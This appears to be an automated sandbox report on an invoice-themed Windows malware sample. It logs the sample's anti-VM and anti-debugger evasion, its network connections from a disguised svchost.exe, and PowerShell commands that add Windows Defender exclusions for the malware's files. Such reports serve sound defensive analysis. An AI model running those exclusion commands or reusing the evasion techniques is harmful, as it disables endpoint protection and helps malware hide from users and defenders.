Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Section loaded: OutputDebugStringW count: 1933
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Section loaded: OutputDebugStringW count: 3875

Source: C:\Windows\explorer.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4663
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 422

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe TID: 6220	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe TID: 6328	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6660	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6660	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7004	Thread sleep time: -270000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1260	Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1260	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: powershell.exe, 00000008.00000003.847824148.00000000059ED000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.950929748.0000000004BC4000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.875887622.0000000005950000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.686038802.00000236B1740000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.730738745.00000189C4740000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.752399716.0000024F07890000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.818024782.0000026433400000.00000002.00000001.sdmp, svchost.exe, 0000001A.00000002.962962123.0000000005F00000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: powershell.exe, 00000008.00000003.847824148.00000000059ED000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.950929748.0000000004BC4000.00000004.00000001.sdmp	Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: explorer.exe, 00000015.00000002.923478543.0000000001098000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}\
Source: svchost.exe, 0000000D.00000002.813320740.00000264324EB000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000D.00000002.812364542.0000026432471000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWpN2d
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.875887622.0000000005950000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.686038802.00000236B1740000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.730738745.00000189C4740000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.752399716.0000024F07890000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.818024782.0000026433400000.00000002.00000001.sdmp, svchost.exe, 0000001A.00000002.962962123.0000000005F00000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.875887622.0000000005950000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.686038802.00000236B1740000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.730738745.00000189C4740000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.752399716.0000024F07890000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.818024782.0000026433400000.00000002.00000001.sdmp, svchost.exe, 0000001A.00000002.962962123.0000000005F00000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000015.00000002.923478543.0000000001098000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Files=CA
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.875887622.0000000005950000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.686038802.00000236B1740000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.730738745.00000189C4740000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.752399716.0000024F07890000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.818024782.0000026433400000.00000002.00000001.sdmp, svchost.exe, 0000001A.00000002.962962123.0000000005F00000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: explorer.exe, 00000019.00000002.917267394.0000000000644000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\o8

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Process information queried: ProcessInformation

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Thread information set: HideFromDebugger

Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe

Code function: 10_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Network Connect: 104.21.71.230 80
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Network Connect: 172.67.172.17 80

Adds a directory exclusion to Windows Defender

Show sources

Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' -Force
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' -Force
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force

Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe

Code function: 10_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' -Force
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process created: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe' /SpecialRun 4101d8 5956
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1

Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run

